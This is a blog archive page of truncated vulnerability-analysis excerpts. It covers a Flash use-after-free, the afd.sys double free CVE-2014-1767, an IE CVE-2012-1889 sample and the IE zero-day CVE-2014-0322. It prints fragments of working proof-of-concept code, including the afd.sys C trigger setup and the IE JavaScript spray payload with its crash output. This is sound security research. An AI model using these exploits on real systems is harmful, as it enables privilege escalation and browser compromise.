Category Archive » Binary Vuln Analysis

This is my first time analysing a Flash sample, and I will share some techniques and experience on how to analyse Flash samples. —- (1) Root cause analysis: ApplicationDomain.currentDomain.domainMemory points to a global array we defined. When we perform certain operations on this array, exceptions happen. We first compress the array, then we corrupt it, and after that we uncompress it; because the data in the array has been changed, the uncompress fails, and the domainMemory has not been notified, so the domainMemory still points to an old array that has already been freed. Note: we can find the code in avmplus (open source). —- (2) How to start: first we need to find the functions in the …..

Hint: for the Chinese version, Click Me. [0x00]. Introduction First, I would like to present the reasons why I focused on this vulnerability: (1) this afd.sys dangling pointer vulnerability was named the best privilege escalation vulnerability at the Pwnie Awards 2014; (2) the vulnerability type is a double free, which is very interesting; (3) so far no exploit code has been released, so it is challenging and exciting to finish an exploit. OK, now let's get to work; our experiment OS is Windows 7 (6.1.7601) 32-bit. [0x01]. Vulnerability root cause analysis A. PoC overview Our most important reference was the paper http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf; from the description in the paper, we can derive our PoC as follows: ================================================= #include <windows.h> #include <stdio.h> #pragma comment(lib, …..

Hint: Click Me for English Version [0x00]. Introduction First, I want to say that there are several reasons for analysing this vulnerability: (1) according to reports, this vulnerability was rated the top privilege escalation vulnerability at the 2014 "hacker Oscars", the Pwnie Awards (AFD.sys Dangling Pointer Vulnerability (CVE-2014-1767)); (2) this vulnerability is a double free, which is quite interesting; (3) so far only one write-up from abroad explaining the approach has been published, and no working exploit has been released, so there is still something to explore. Starting from the PoC, this article analyses the root cause of the vulnerability on the Windows 7 x86 platform and implements as complete a privilege escalation exploit as possible :). [0x01]. Vulnerability root cause analysis A. First look Our most authoritative and most helpful reference is the PDF below. http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf Based on the description in the PDF we derive the following PoC. All experiments in this article were carried out on a Windows 7 (6.1.7601) 32-bit system. ================================================= #include <windows.h> #include <stdio.h> #pragma comment(lib, "WS2_32.lib") int main() { DWORD targetSize = 0x310 ; DWORD virtualAddress = 0x13371337 ; DWORD mdlSize=(0x4000*(targetSize-0x30)/8)-0xFFF-(virtualAddress& 0xFFF) ; static DWORD inbuf1[100] ; memset(inbuf1, 0, sizeof(inbuf1)) ; inbuf1[6] = virtualAddress ; inbuf1[7] = mdlSize ; inbuf1[10] = 1 ; static DWORD inbuf2[100] ; memset(inbuf2, 0, sizeof(inbuf2)) ; inbuf2[0] = 1 ; inbuf2[1] = 0x0AAAAAAA ; WSADATA WSAData ; SOCKET s ; sockaddr_in sa ; int ierr ; …..

Hi, this is an IE exploit sample. I found it on VirusTotal: https://www.virustotal.com/en/file/1df80150284800e82b1dd64579aae71ebce2f6fd44ea37e4c83af287502452ee/analysis/ But I see the detection ratio is very low, 12 / 51; many vendors cannot detect this sample. From the VT tag, it seems to be CVE-2012-1889, which is really an old vulnerability. We can also find the exploit code here: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb Now let's look through this sample. The PoC code is as follows: <script type="text/javascript">// <![CDATA[ var obj=document.getElementById('puZz').object; var src=unescape("%"+"u0c08"+"%"+"u0c0c"); while(src.length<0x1002)src+=src; src="\\\\xxx"+src; src=src.substr(0,0x1000-10); var pic=document.createElement("img"); pic.src=src; pic.nameProp; obj['definition'](1000); // ]]></script> Now we load the PoC in IE. It crashes. (90c.76c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0c0c0c08 ebx=00000000 ecx=5dda5dfc …..

Yesterday, FireEye posted a blog about a new 0-day attack (http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/new-ie-zero-day-found-in-watering-hole-attack-2.html) (http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html). This 0-day affects IE 10, has been assigned CVE-2014-0322, and can be used in APT attacks. We can find the sample here: http://jsunpack.jeek.org/?report=a7d85dd462456a816b1ebc8306550e0c9b61c75e